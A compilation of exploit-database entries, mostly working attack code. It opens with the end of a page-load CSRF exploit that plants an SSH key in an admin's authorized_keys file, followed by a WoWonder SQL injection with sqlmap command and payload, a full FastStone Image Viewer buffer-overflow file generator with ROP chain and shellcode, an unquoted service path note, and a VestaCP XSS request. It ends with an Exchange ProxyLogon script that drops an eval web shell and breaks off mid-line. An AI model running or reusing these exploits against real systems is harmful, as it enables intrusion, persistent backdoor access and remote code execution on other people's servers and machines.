    var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`;
    var fileContent = new Blob([mystring], { type: 'text/plain' });
    // Implicit global (no var/let); kept as the author wrote it.
    myFormData = new FormData();
    myFormData.append("files", fileContent, "authorized_keys");
    // The response is never read; the request only has to reach the server.
    fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", {
        method: "post",
        body: myFormData,
        credentials: "include"
    });
}
</script>
</head>
<!-- Fires on page load: no user interaction is needed beyond opening the page. -->
<body onload="exploit();">
</body>
</html>
WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection # Date: 16.03.2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://www.wowonder.com/ # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 # Version: < 3.1 # Tested on: Linux/Windows DESCRIPTION In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter. The vulnerability is found in the "event_id" parameter of the GET request sent to requests.php. Example: /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID If an attacker exploits this vulnerability, they may access private data in the database system. EXPLOITATION # GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1 # Host: Target Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
# Exploit Author: Paolo Stagno
# Date: 15/03/2020
# Vendor Homepage: https://www.faststone.org/
# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe
# https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/
# Version: 7.5
# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256
# Category: local exploit
# Platform: windows
# Module info :
#----------------------------------------------------------------------------------------------------------------------
#Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
#----------------------------------------------------------------------------------------------------------------------
#0x00400000 | 0x00abf000 | 0x006bf000 | False | False | False | False | False | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe)
#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False | False | False | False | False | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll)
#0x6afb0000 | 0x6b011000 | 0x00061000 | True | True | False | False | False | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll)
#----------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python
# NOTE(review): this generator is Python 2 code — str objects are used as byte
# buffers (''.join over struct.pack, file opened in "w" mode) and `/` below is
# integer division. The module table above is the defender-relevant part: the
# main executable and fsplugin05.dll are loaded without ASLR/NXCompat, which is
# what makes the fixed gadget addresses in this file usable. Building the
# viewer and its plugins with ASLR and DEP enabled removes that precondition.
import struct, sys
print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n")
filename="FSViewer_v.7.5_exploit.cur"
###################################################################################
# Shellcode
# MAX Shellcode size: 556
# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556
# Custom calc.exe shellcode
# size: 112
###################################################################################
shellcode=(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7"
)
# Hard cap derived from the layout arithmetic above; the first image's data
# area is fixed at 776 bytes by the entry's SizeInBytes.
if (len(shellcode)>556):
    sys.exit("Shellcode's size must be <= 556 bytes")
###################################################################################
# Cur File Format
# ---------------------------------------------------------------------------------
# | Reserved | Type | Image Count |
# | 00 00 | 02 00 | 02 00 | <- CUR file will contains two images
# Entries:
# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset |
# | 30 | 30 | 00 | 00 | 01 00 | 02 00 | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode
# | 20 | 20 | 00 | 00 | 02 00 | 04 00 | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact)
# 1st Image Info Header:
# | Size | Width | Height | Planes | BitCount | Compression | ImageSize | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant |
# | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00 | 89 30 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 |
# 1st ImageData(BLOB)
# 2nd Image Info Header:
# 2nd ImageData(BLOB)
# ---------------------------------------------------------------------------------
# BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow
# its value can be modified but we need to account for two operations happening into the software.
# - SHL 1, 89 = 0x200
# - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file
# we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes
# ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d)
###################################################################################
# Defender note: the root cause described above is a read size derived from
# the file-controlled BitCount without a bounds check against the destination
# buffer. BitCount 0x3089 is not a legal BMP value (1/4/8/16/24/32); a parser
# that validated it, or a scanner that flags .cur/.ico files with such a
# header, would catch this file before it is rendered.
image_data_pad = 776

def create_rop_nop():
    # One 4-byte "do nothing" gadget, repeated by the caller to fill the
    # distance between the pivot landing point and the real chain.
    rop_gadgets = [
        0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ}
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

def create_rop_chain():
    # 17 little-endian dwords (68 bytes). Every address is absolute, which is
    # only possible because the modules in the header table are not ASLR'd.
    rop_gadgets = [
        #[---INFO:gadgets_to_set_esi:---]
        0x00405bd4, # POP EAX ; RETN [FSViewer.exe]
        0x6adf4160, # ptr to &VirtualProtect() [IAT fsplugin05.dll]
        0x008b3977, # MOV EAX,DWORD PTR DS:[EAX] ; RETN [FSViewer.exe]
        0x0083f67a, # XCHG EAX,ESI ; RETN [FSViewer.exe]
        #[---INFO:gadgets_to_set_ebp:---]
        0x005b35b8, # POP EBP ; RETN [FSViewer.exe]
        0x00454521, # & jmp esp [FSViewer.exe]
        #[---INFO:gadgets_to_set_ebx:---]
        0x00630472, # POP EBX ; RETN [FSViewer.exe]
        0x00000201, # 0x00000201-> ebx
        #[---INFO:gadgets_to_set_edx:---]
        0x004798db, # POP EDX ; RETN [FSViewer.exe]
        0x00000040, # 0x00000040-> edx
        #[---INFO:gadgets_to_set_ecx:---]
        0x004c7832, # POP ECX ; RETN [FSViewer.exe]
        0x00991445, # &Writable location [FSViewer.exe]
        #[---INFO:gadgets_to_set_edi:---]
        0x0040c3a8, # POP EDI ; RETN [FSViewer.exe]
        0x0057660b, # RETN (ROP NOP) [FSViewer.exe]
        #[---INFO:gadgets_to_set_eax:---]
        0x00404243, # POP EAX ; RETN [FSViewer.exe]
        0x90909090, # nop
        #[---INFO:pushad:---]
        0x6adc21bf, # PUSHAD # RETN [fsplugin05.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# Cur image = 1597 bytes
###################################################################################
cur_Signature = "\x00\x00\x02\x00\x02\x00" # | Reserved | Type | Image Count |
cur_Entries = (
    "\x30\x30\x00\x00\x01\x00\x02\x00\x30\x03\x00\x00\x26\x00\x00\x00" # 1st Entry
    "\x20\x20\x00\x00\x02\x00\x04\x00\xE8\x02\x00\x00\x56\x03\x00\x00" # 2nd Entry
)
# 1st Image Info Header
# BitCount field (bytes 14-15) is \x89\x30 = 0x3089 — the malformed value the
# format notes above describe.
cur_1InfoHeader = "\x28\x00\x00\x00\x30\x00\x00\x00\x60\x00\x00\x00\x01\x00\x89\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# 1st ImageData
# cur_1ImageData_orig = "\x00\x00\x00\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xC0\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x80\x41\x00\x1F\x80\x00\x00\x00\xC0\x41\x00\x3F\xC0\x00\x00\x00\xA0\x82\x00\x3F\xC0\x00\x00\x00\x90\x82\x00\x1F\x80\x00\x00\x00\x89\x04\x00\x00\x00\x00\x00\x00\x85\x04\x00\x1F\x80\x00\x00\x00\x82\x08\x00\x1F\x80\x00\x00\x00\x80\x0F\xFE\x1F\x80\x00\x00\x00\x80\x00\x04\x1F\x80\x00\x00\x00\x80\x00\x08\x0F\x80\x00\x00\x00\x80\x00\x10\x07\xC0\x00\x00\x00\x80\x00\x20\x03\xE0\x00\x00\x00\x80\x00\x47\xC1\xF0\x00\x00\x00\x80\x00\x87\xC1\xF8\x00\x00\x00\x80\x01\x07\xC1\xFC\x00\x00\x00\x80\x02\x07\xC1\xFC\x00\x00\x00\x80\x04\x07\xC1\xFC\x00\x00\x00\x80\x08\x07\xC1\xFC\x00\x00\x00\x80\x10\x07\xE3\xFC\x00\x00\x00\x80\x20\x03\xFF\xF8\x00\x00\x00\x80\x40\x01\xFF\xF0\x00\x00\x00\x80\x80\x00\xFF\xE0\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00\xA0\x00\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xF8\x3F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xE0\x7F\xFF\x00\x00\x7F\x80\xFF\xC0\x3F\xFF\x00\x00\x3F\x80\xFF\x80\x1F\xFF\x00\x00\x1F\x01\xFF\x80\x1F\xFF\x00\x00\x0F\x01\xFF\xC0\x3F\xFF\x00\x00\x06\x03\xFF\xE0\x7F\xFF\x00\x00\x02\x03\xFF\xC0\x3F\xFF\x00\x00\x00\x07\xFF\xC0\x3F\xFF\x00\x00\x00\x00\x01\xC0\x3F\xFF\x00\x00\x00\x00\x03\xC0\x3F\xFF\x00\x00\x00\x00\x07\xE0\x3F\xFF\x00\x00\x00\x00\x0F\xF0\x1F\xFF\x00\x00\x00\x00\x10\x18\x0F\xFF\x00\x00\x00\x00\x30\x1C\x07\xFF\x00\x00\x00\x00\x70\x1C\x03\xFF\x00\x00\x00\x00\xF0\x1C\x01\xFF\x00\x00\x00\x01\xF0\x1C\x01\xFF\x00\x00\x00\x03\xF0\x1C\x01\xFF\x00\x00\x00\x07\xF0\x1C\x01\xFF\x00\x00\x00\x0F\xF0\x00\x01\xFF\x00\x00\x00\x1F\xF8\x00\x03\xFF\x00\x00\x00\x3F\xFC\x00\x07\xFF\x00\x00\x00\x7F\xFE\x00\x0F\xFF\x00\x00\x00\xFF\xFF\x00\x1F\xFF\x00\x00\x01\xFF\xFF\xFF\xFF\xFF\x00\x00\x03\xFF\xFF\xFF\xFF\xFF\x00\x00\x07\xFF\xFF\xFF\xFF\xFF\x00\x00\x0F\xFF\xFF\xFF\xFF\xFF\x00\x00\x1F\xFF\xFF\xFF\xFF\xFF\x00\x00\x3F\xFF\xFF\xFF\xFF\xFF\x00\x00\x7F\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00"
print("Generating 1st ImageData BLOB:")
# Layout of the 776-byte data area: ROP NOP sled, chain, stack adjustment,
# shellcode, then 'A' padding up to image_data_pad.
cur_1ImageData = ""
cur_1ImageData += create_rop_nop() * ( (1560 - 1416 ) / 4 ) # 1560 stack pivot - 1416 where our cyclic pattern has been found
print("- ROP NOP:\t\t{}".format(len(cur_1ImageData)))
cur_1ImageData += create_rop_chain()
print("- ROP Chain:\t\t{}".format(len(create_rop_chain())))
cur_1ImageData += "\x81\xC4\x44\xFD\xFF\xFF\x90\x90" # stack adjustment for meterpreter GetPC routine: add esp, -700
print("- Stack Adjustment:\t8")
cur_1ImageData += shellcode
print("- Shellcode:\t\t{}".format(len(shellcode)))
cur_1ImageData += "A" * (image_data_pad - len(cur_1ImageData))
# 2nd Image Info Header
cur_2InfoHeader = "\x28\x00\x00\x00\x20\x00\x00\x00\x40\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# 2nd ImageData (if this does not trigger the stack pivot it should be changed removing the beginning \x00 byte of cur_2ImageData2 and adding it back at the end of cur_2ImageData section)
cur_2ImageData = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xC0\xC0\xC0\x00\x80\x80\x80\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF1\x11\x11\xF0\x00\xF1\x11\x11\x10\xFF\xFF\xF0\x11\x11\x11\x11\xFF\x11\x11\xF0\x00\xF1\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\xF1\x1F\x00\x0F\x11\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\xF0\x0F\x1F\x00\x0F\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\xF0\x00\xF1\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\xFF\xFF\xFF\xF1\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\x0F\x11\x11\x10\xFF\xF0\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\xF1\x00\x00\x01\x0F\xFF\x01\x11\x11\x11\xF0\x00\x00\x00\x00\x0F\x11\x0F\xFF\x01\x10\xFF\xF0\x11\x11\x11\xF0\x00\x00\x00\x00\xF1\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\x0F\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\xF1\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00"
# SEH record overwrite goes here
cur_2ImageData2 = "\x00\xFF\xF0\x0F\xFF\xF0\x11\x11\x11\xF0\x00\x00\xF1\x11\x11\x11\x11\x0F\xFF\xFF\xFF\x01\x11\x11\x11\xF0\x00\x0F\x11\x11\x11\x11\x11\x10\x00\x00\x00\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x0F\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE3\xFF\xFF\xFF\xC1\xFF\xFF\xFF\xC1\xFF\xFF\xFF\x83\xF8\xFF\xFF\x83\xF0\x7F\xDF\x07\xE0\x3F\xCF\x07\xF0\x7F\xC6\x0F\xF8\xFF\xC2\x0F\xF0\x7F\xC0\x1F\xF0\x7F\xC0\x00\x70\x7F\xC0\x00\xF8\x3F\xC0\x01\x04\x1F\xC0\x03\x06\x0F\xC0\x07\x06\x07\xC0\x0F\x06\x07\xC0\x1F\x06\x07\xC0\x3F\x80\x0F\xC0\x7F\xC0\x1F\xC0\xFF\xE0\x3F\xC1\xFF\xFF\xFF\xC3\xFF\xFF\xFF\xC7\xFF\xFF\xFF\xCF\xFF\xFF\xFF\xDF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
###################################################################################
# Assemble the file in on-disk order: header, two directory entries, image 1
# (corrupted), image 2 with a single 4-byte overwrite spliced into its data.
buf = ""
buf += cur_Signature
buf += cur_Entries
buf += cur_1InfoHeader
buf += cur_1ImageData
buf += cur_2InfoHeader
buf += cur_2ImageData
# buf += struct.pack('<I',0x004023da) # SEH pop ecx ; pop ebp ; ret | startnull {PAGE_EXECUTE_READ} [FSViewer.exe]
# 0x0019dc10 : Pointer into normal cyclic pattern at ESP+0x588 (+1416) : 0x0019dc48 : offset 1, length 775
buf += struct.pack('<I',0x6adad2ff) # stack pivot 1560 / 0x618 : ADD ESP,608 ; POP EBX ; POP ESI ; POP EDI ; POP EBP ; RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ}
buf += cur_2ImageData2
#buf += "B" * (buf_max_size - len(buf))
print("\nWriting CUR File:")
print("--------------------------------------------------------")
print("- Signature + ImageCount:\t{}".format(len(cur_Signature)))
print("- Entries 2/2:\t\t\t{}".format(len(cur_Entries)))
print("- 1st InfoHeader:\t\t{}".format(len(cur_1InfoHeader)))
print("- 1st ImageData:\t\t{}".format(len(cur_1ImageData)))
print("- 2nd InfoHeader:\t\t{}".format(len(cur_2InfoHeader)))
print(" 2nd ImageData 1/2:\t{}".format(len(cur_2ImageData)))
print(" SEH:\t\t\t4")
print(" 2nd ImageData 2/2:\t{}".format(len(cur_2ImageData2)))
print("- 2nd ImageData TOT:\t\t{}".format(len(cur_2ImageData)+4+len(cur_2ImageData2)))
print("--------------------------------------------------------")
print("[+] Writing total {} bytes on {}".format(len(buf), filename))
# Text mode ("w") is only byte-transparent on Python 2 / non-Windows newline handling.
file = open(filename, "w"); file.write(buf); file.close();
-
VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path
# Exploit Title: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path # Date: 2021-2-6 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://vfsforgit.org/ # Software Link: https://github.com/microsoft/VFSForGit/releases/download/v1.0.21014.1/SetupGVFS.1.0.21014.1.exe # Version: 1.0.21014.1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc GVFS.Service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GVFS.Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\GVFS\GVFS.Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GVFS.Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: The BINARY_PATH_NAME shown above is unquoted and contains a space, and the service is configured as AUTO_START under LocalSystem; this vulnerability could therefore permit executing code during startup or reboot with escalated privileges. Quoting the binary path in the service configuration removes the issue.
-
VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS
# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS # Date: 07.03.2021 # Author: Numan Türle # Vendor Homepage: https://vestacp.com # Software Link: https://myvestacp.com < 0.9.8-26-43 # Software Link: https://vestacp.com < 0.9.8-26 # Tested on: VestaCP POST /add/ip/ HTTP/1.1 Host: TARGET:8083 Connection: close Content-Length: 165 Cache-Control: max-age=0 Origin: https://TARGET:8083 Content-Type: application/x-www-form-urlencoded User-Agent: USER-AGENT Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://TARGET:8083/add/ip/ Accept-Encoding: gzip, deflate Accept-Language: en,tr-TR; Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0 sec-gpc: 1 token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add
-
Microsoft Exchange 2019 - Server-Side Request Forgery
import requests from urllib3.exceptions import InsecureRequestWarning import random import string import sys def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) if len(sys.argv) < 2: print("使用方式: python PoC.py <target> <email>") print("使用方式: python PoC.py mail.btwaf.cn [email protected]") exit() proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) target = sys.argv[1] email = sys.argv[2] random_name = id_generator(4) + ".js" user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx" shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path # webshell-马子内容 shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>' autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> """ % email print("正在获取Exchange Server " + target+"权限") print("=============================") FQDN = "EXCHANGE01" ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False,proxies=proxies) if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: FQDN = ct.headers["X-FEServer"] ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent}, 
data=autoDiscoverBody, proxies=proxies, verify=False ) if ct.status_code != 200: print(ct.status_code) print("Autodiscover Error!") exit() if "<LegacyDN>" not in str(ct.content): print("Can not get LegacyDN!") exit() legacyDn = str(ct.content).split("<LegacyDN>")[1].split(r"</LegacyDN>")[0] print("Got DN: " + legacyDn) mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, "Content-Type": "application/mapi-http", "X-Requesttype": "Connect", "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}", "X-Clientapplication": "Outlook/15.0.4815.1002", "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456", "User-Agent": user_agent }, data=mapi_body, verify=False, proxies=proxies ) if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content): print("Mapi Error!") exit() sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0] print("Got SID: " + sid) sid = sid.replace(sid.split("-")[-1],"500") proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r> """ % sid ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "msExchLogonMailbox": "S-1-5-20", "User-Agent": user_agent }, data=proxyLogon_request, proxies=proxies, verify=False ) if ct.status_code != 241 or not "set-cookie" in ct.headers: print("Proxylogon Error!") exit() sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] msExchEcpCanary = 
